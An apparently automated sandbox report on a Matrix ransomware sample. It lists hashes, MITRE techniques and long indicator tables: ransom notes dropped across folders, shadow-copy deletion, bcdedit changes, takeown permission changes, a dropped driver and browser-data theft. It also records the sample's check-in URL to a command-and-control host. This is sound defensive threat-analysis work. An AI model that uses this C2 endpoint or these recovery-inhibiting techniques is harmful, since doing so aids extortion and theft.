matrix | 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a

Analysis

max time kernel
106s
max time network
109s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
28-12-2022 18:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
Size

1.2MB
MD5

c50c17057fc6ea67bc579196f1f73712
SHA1

44495db58fa7c94db840a3f696c8f546a5fce2d1
SHA256

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a
SHA512

7c5eb6317b0a51ae93302adb223d6163a5c771d5b1d8d77462c2463c37f32e0f7f957526a36e39ae5272687e4ebe2faf2d02e68601bc87afc95fc9d7145538aa
SSDEEP

24576:pxsxl/OOeI7RC4CJR5ez+IlnRJE5rABxPJhPPT/q:8fjRERAhPPzq

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File created	C:\ProgramData\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\More Games\it-IT\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\Favorites\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\art\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Extensions\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\WidevineCdm\_platform_specific\win_x64\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jre7\lib\security\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\fr-FR\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jre7\lib\images\cursors\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\ProgramData\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ae6vytmk.default-release\storage\default\moz-extension+++06812acc-30fe-4c25-b511-11cb8bde5334^userContextId=4294967295\idb\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\Purble Place\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\skins\fonts\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Argentina\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Spades\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\Favorites\Microsoft Websites\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Media Player\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\Minesweeper\ja-JP\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ae6vytmk.default-release\startupCache\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jre7\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\ProgramData\Microsoft Help\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
HTTP URL	13	http://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=VUIIVLGQ\|Admin&sid=Lz7DeQDvTSEKa2vu&phase=[FIN]36901D6AB108E9C3\|3414\|154\|3568
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\Mahjong\es-ES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Checkers\de-DE\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jre7\lib\amd64\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jre7\lib\jfr\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

2456 bcdedit.exe
752 bcdedit.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

8 1948 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

b3EHwRvV64.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS b3EHwRvV64.exe

pid	process
2456	bcdedit.exe
752	bcdedit.exe

flow	pid	process
8	1948	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	b3EHwRvV64.exe

Executes dropped EXE 64 IoCs

Processes:

NWRDmPHs.exeb3EHwRvV.exeb3EHwRvV64.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exeb3EHwRvV.exe

pid	process
1336	NWRDmPHs.exe
1372	b3EHwRvV.exe
1556	b3EHwRvV64.exe
1304	b3EHwRvV.exe
468	b3EHwRvV.exe
1824	b3EHwRvV.exe
2028	b3EHwRvV.exe
1608	b3EHwRvV.exe
1600	b3EHwRvV.exe
968	b3EHwRvV.exe
1476	b3EHwRvV.exe
1048	b3EHwRvV.exe
2004	b3EHwRvV.exe
568	b3EHwRvV.exe
996	b3EHwRvV.exe
996	b3EHwRvV.exe
1048	b3EHwRvV.exe
1048	b3EHwRvV.exe
1304	b3EHwRvV.exe
1100	b3EHwRvV.exe
1896	b3EHwRvV.exe
568	b3EHwRvV.exe
992	b3EHwRvV.exe
1896	b3EHwRvV.exe
604	b3EHwRvV.exe
2028	b3EHwRvV.exe
604	b3EHwRvV.exe
1948	b3EHwRvV.exe
2028	b3EHwRvV.exe
1100	b3EHwRvV.exe
1724	b3EHwRvV.exe
604	b3EHwRvV.exe
1896	b3EHwRvV.exe
1524	b3EHwRvV.exe
1896	b3EHwRvV.exe
888	b3EHwRvV.exe
2060	b3EHwRvV.exe
2128	b3EHwRvV.exe
2144	b3EHwRvV.exe
2216	b3EHwRvV.exe
2232	b3EHwRvV.exe
2304	b3EHwRvV.exe
2320	b3EHwRvV.exe
2392	b3EHwRvV.exe
2408	b3EHwRvV.exe
2480	b3EHwRvV.exe
2496	b3EHwRvV.exe
2568	b3EHwRvV.exe
2584	b3EHwRvV.exe
2660	b3EHwRvV.exe
2676	b3EHwRvV.exe
2748	b3EHwRvV.exe
2764	b3EHwRvV.exe
2836	b3EHwRvV.exe
2856	b3EHwRvV.exe
2956	b3EHwRvV.exe
2996	b3EHwRvV.exe
1524	b3EHwRvV.exe
2104	b3EHwRvV.exe
2176	b3EHwRvV.exe
2200	b3EHwRvV.exe
2184	b3EHwRvV.exe
2172	b3EHwRvV.exe
2272	b3EHwRvV.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

b3EHwRvV64.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	b3EHwRvV64.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/1372-95-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/1304-106-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/468-111-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/1824-120-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/2028-126-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/1608-135-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/1600-140-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/968-149-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/1476-154-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/1048-163-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/2004-168-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/568-177-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/996-182-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/996-191-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/1048-196-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/1048-200-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/1304-204-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/1100-208-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/1896-212-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe	upx
behavioral1/memory/568-216-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/992-220-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Loads dropped DLL 64 IoCs

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.execmd.exeb3EHwRvV.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

pid	process
1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
768	cmd.exe
1372	b3EHwRvV.exe
1580	cmd.exe
1116	cmd.exe
808	cmd.exe
1068	cmd.exe
996	cmd.exe
1304	cmd.exe
1580	cmd.exe
1724	cmd.exe
468	cmd.exe
1896	cmd.exe
1116	cmd.exe
1100	cmd.exe
1256	cmd.exe
1608	cmd.exe
992	cmd.exe
968	cmd.exe
1820	cmd.exe
1600	cmd.exe
2028	cmd.exe
604	cmd.exe
1048	cmd.exe
1100	cmd.exe
1100	cmd.exe
1896	cmd.exe
968	cmd.exe
1724	cmd.exe
1256	cmd.exe
1048	cmd.exe
888	cmd.exe
1256	cmd.exe
1600	cmd.exe
888	cmd.exe
1048	cmd.exe
1524	cmd.exe
2120	cmd.exe
2076	cmd.exe
2208	cmd.exe
2164	cmd.exe
2296	cmd.exe
2252	cmd.exe
2384	cmd.exe
2340	cmd.exe
2468	cmd.exe
2424	cmd.exe
2560	cmd.exe
2512	cmd.exe
2652	cmd.exe
2600	cmd.exe
2740	cmd.exe
2692	cmd.exe
2828	cmd.exe
2780	cmd.exe
2948	cmd.exe
2872	cmd.exe
2028	cmd.exe
3028	cmd.exe
2096	cmd.exe
2136	cmd.exe
2232	cmd.exe
2208	cmd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
2360
3028	takeown.exe
2928	takeown.exe
532	takeown.exe
2004	takeown.exe
2096	takeown.exe
568	takeown.exe
2692	takeown.exe
1168	takeown.exe
824
1328
2908	takeown.exe
308	takeown.exe
432	takeown.exe
1508
3000
2692
2388
2460	takeown.exe
2580	takeown.exe
2060	takeown.exe
2204
204	takeown.exe
1576	takeown.exe
1332
1256
2212
2788
1724
2004
2200	takeown.exe
920
2636	takeown.exe
2828	takeown.exe
2452	takeown.exe
1984
1048	takeown.exe
584	takeown.exe
2244
2884	takeown.exe
1392
2732	takeown.exe
2084	takeown.exe
808
2728	takeown.exe
2308	takeown.exe
2812	takeown.exe
2908
2504
1048	takeown.exe
2080	takeown.exe
2124	takeown.exe
2548	takeown.exe
1960	takeown.exe
204	takeown.exe
2648	takeown.exe
2220	takeown.exe
3016	takeown.exe
1516	takeown.exe
968	takeown.exe
2928
2176
2744
2412	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 41 IoCs

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\YB33FE3E\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\FPMCGPEN\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
